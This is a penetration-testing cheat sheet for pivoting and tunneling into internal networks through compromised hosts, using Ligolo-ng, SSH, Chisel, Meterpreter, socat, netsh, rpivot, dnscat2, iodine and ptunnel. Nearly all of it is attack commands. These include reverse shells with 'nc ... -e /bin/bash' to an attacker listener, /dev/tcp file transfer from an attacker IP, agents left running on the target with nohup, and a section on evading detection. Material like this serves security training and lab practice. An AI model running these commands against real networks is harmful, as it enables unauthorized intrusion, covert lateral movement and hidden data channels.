Pivoting & Tunneling Establish network tunnels and SOCKS proxies to access internal networks through compromised hosts.
Ligolo-ng Setup Ligolo Interface (Attacker) sudo ip tuntap add user $USER mode tun ligolosudo ip link set ligolo upip addr show ligolo
Start Ligolo Proxy (Attacker) ./proxy -selfcert -laddr 0.0.0.0:11601 ./proxy -autocert -laddr 0.0.0.0:11601 openssl req -x509 -newkey rsa:2048 -nodes -keyout key.pem -out cert.pem -days 365 -subj "/CN=ligolo" ./proxy -laddr 0.0.0.0:11601 -certfile cert.pem -keyfile key.pem
Transfer and Run Agent (Target) scp -i key agent root@10.10.10.10:/tmp/agent ./agent -connect 10.10.14.5:11601 -ignore-cert ssh -i key root@10.10.10.10 "nohup ./agent -connect 10.10.14.5:11601 -ignore-cert > /dev/null 2>&1 &"
session ifconfig sudo ip route add 172.16.5.0/24 dev ligolostart
Auto-Routing Port Forwarding with Ligolo Forward for File Transfers listener_add --addr 0.0.0.0:1337 --to 10.10.14.5:8000 --tcp python3 -m http.server 8000 wget http://172.16.5.10:1337/file.txt
Forward for Reverse Shells listener_add --addr 0.0.0.0:8443 --to 10.10.14.5:4444 --tcp nc -lvnp 4444 nc 172.16.5.10 8443 -e /bin/bash
List and Delete Listeners listener_list listener_del
Access Local Services (127.0.0.1) sudo ip route add 240.0.0.1/32 dev ligolonmap 240.0.0.1
Double Pivot (Pivot through Pivot) Setup Second Tunnel Interface sudo ip tuntap add user $USER mode tun ligolo-doublesudo ip link set ligolo-double up
Forward Ligolo Traffic Through First Pivot listener_add --addr 172.16.5.10:11601 --to 10.10.14.5:11601 --tcp
Connect Second Agent ./agent -connect 172.16.5.10:11601 -ignore-cert
Route to Third Network session ifconfig sudo ip route add 172.16.3.0/24 dev ligolo-doublestart --tun ligolo-double
Troubleshooting Ligolo Delete Problematic Routes route_del sudo ip route del 172.16.5.0/24 dev ligolo
Delete Interface sudo ip link delete ligolosudo ip link delete ligolo-double
Fix “File Already Exists” Error sudo ip route showsudo ip route del 172.16.5.0/24
SSH Tunneling Dynamic Port Forwarding (SOCKS Proxy) ssh -D 1080 user@10.10.10.10 ssh -N -D 1080 user@10.10.10.10 ssh -f -N -D 1080 user@10.10.10.10
sudo nano /etc/proxychains4.confsocks5 127.0.0.1 1080 proxychains nmap -sT -Pn 172.16.5.10 proxychains curl http://172.16.5.10
Local Port Forwarding ssh -L 8080:172.16.5.10:80 user@10.10.10.10 curl http://127.0.0.1:8080 ssh -L 9090:172.16.5.20:3389 user@10.10.10.10
Remote Port Forwarding ssh -R 8080:127.0.0.1:80 user@10.10.10.10 ssh -R 4444:127.0.0.1:4444 user@10.10.10.10
SSH Tunnel Combinations ssh -L 8080:172.16.5.10:80 -L 3389:172.16.5.20:3389 user@10.10.10.10 ssh -D 1080 -L 8080:172.16.5.10:80 user@10.10.10.10 ssh -o ServerAliveInterval=60 -D 1080 user@10.10.10.10
Chisel Installation and Compilation git clone https://github.com/jpillora/chisel.git cd chiselgo build go build -ldflags="-s -w" upx --brute chisel
Transfer Chisel cat chisel | nc -lvnp 9001cat < /dev/tcp/10.10.14.5/9001 > chiselchmod +x chiselpython3 -m http.server 8000 wget http://10.10.14.5:8000/chisel
Forward Pivot (Target as Server) Start Server on Target ./chisel server -p 9001 --socks5
Connect Client from Attacker ./chisel client 10.10.10.10:9001 socks
Reverse Pivot (Attacker as Server) Start Server on Attacker ./chisel server --reverse -p 1234 --socks5
Connect Client from Target ./chisel client 10.10.14.5:1234 R:socks
sudo nano /etc/proxychains4.confsocks5 127.0.0.1 1080 proxychains nmap -sT -Pn 172.16.5.10
Chisel Port Forwarding Local Port Forward ./chisel client 10.10.10.10:9001 8080:172.16.5.10:80 curl http://127.0.0.1:8080
Remote Port Forward ./chisel server --reverse -p 1234 ./chisel client 10.10.14.5:1234 R:9090:127.0.0.1:8080
Autoroute meterpreter> run autoroute -s 172.16.5.0/24 meterpreter> run autoroute -p use auxiliary/scanner/portscan/tcp set RHOSTS 172.16.5.10set SESSION 1run
Port Forwarding meterpreter> portfwd add -l 3389 -p 3389 -r 172.16.5.10 meterpreter> portfwd list meterpreter> portfwd delete -l 3389
SOCKS Proxy use auxiliary/server/socks_proxy set SRVHOST 127.0.0.1set SRVPORT 1080set VERSION 5run -j proxychains nmap -sT -Pn 172.16.5.10
Socat Port Forwarding socat TCP-LISTEN:8080,fork TCP:172.16.5.10:80 socat TCP-LISTEN:4444 TCP:172.16.5.10:4444
Reverse Shell Relay socat TCP-LISTEN:4444,fork TCP:10.10.14.5:4444 nc -lvnp 4444 nc 172.16.5.10 4444 -e /bin/bash
Netsh (Windows) Port Forwarding # Add port forward netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0 .0 .0 .0 connectport=80 connectaddress=172 .16 .5 .10 # List forwards netsh interface portproxy show all # Delete forward netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0 .0 .0 .0
Rpivot (Reverse SOCKS) Server on Attacker python server.py --proxy-port 1080 --server-port 9999 --server-ip 0.0.0.0
Client on Target python client.py --server-ip 10.10.14.5 --server-port 9999
Use with Proxychains socks4 127.0.0.1 1080 proxychains nmap -sT -Pn 172.16.5.10
DNS Tunneling Dnscat2 Server (Attacker) ruby dnscat2.rb --dns domain=tunnel.com --secret=password
Client (Target) ./dnscat tunnel.com --secret=password
Iodine Server (Attacker) sudo iodined -f -c -P password 10.0.0.1 tunnel.com
Client (Target) sudo iodine -f -P password tunnel.com
ICMP Tunneling Ptunnel Server (Attacker) Client (Target) sudo ptunnel -p 10.10.14.5 -lp 8000 -da 172.16.5.10 -dp 80 -x password
Notes Ligolo-ng Advantages:
Fast and efficient
Multiple pivots support
Easy port forwarding
Auto-routing feature
Minimal setup required
SSH Tunneling:
Native on Linux systems
Encrypted by default
Dynamic (SOCKS) and static (port forward) options
Requires SSH access
Can be slow for large data transfers
Chisel:
Cross-platform (Windows, Linux, macOS)
Single binary
Reverse pivot support
SOCKS5 proxy
Can be compressed to small size
Metasploit Pivoting:
Integrated with Metasploit framework
Autoroute for easy routing
SOCKS proxy support
Port forwarding
Requires Meterpreter session
Tool Selection:
Ligolo-ng - Best overall, fast, feature-richSSH - When SSH access available, encryptedChisel - Cross-platform, firewall-friendlyMetasploit - When using Metasploit frameworkSocat - Simple port forwardingDNS/ICMP - When other protocols blocked
Proxychains Configuration:
Edit /etc/proxychains4.conf or /etc/proxychains.conf
Use socks5 for SOCKS5 proxies
Use socks4 for SOCKS4 proxies
Chain multiple proxies if needed
Use -q flag for quiet mode
Common Pitfalls:
Forgetting to add routes
Wrong SOCKS version in proxychains
Firewall blocking pivot traffic
Not starting tunnel after adding routes
Conflicting port forwards
Performance Considerations:
SSH tunneling can be slow
Ligolo-ng is fastest
DNS tunneling is very slow
ICMP tunneling is slow
Consider bandwidth when choosing tool
Detection Evasion:
DNS tunneling blends with normal DNS
ICMP tunneling uses ping packets
SSH tunneling is encrypted
Chisel can use HTTP/HTTPS
Avoid obvious port numbers
Troubleshooting:
Verify routes with ip route show
Check firewall rules
Test connectivity with ping/nmap
Verify proxy is listening
Check proxychains configuration
Use verbose mode for debugging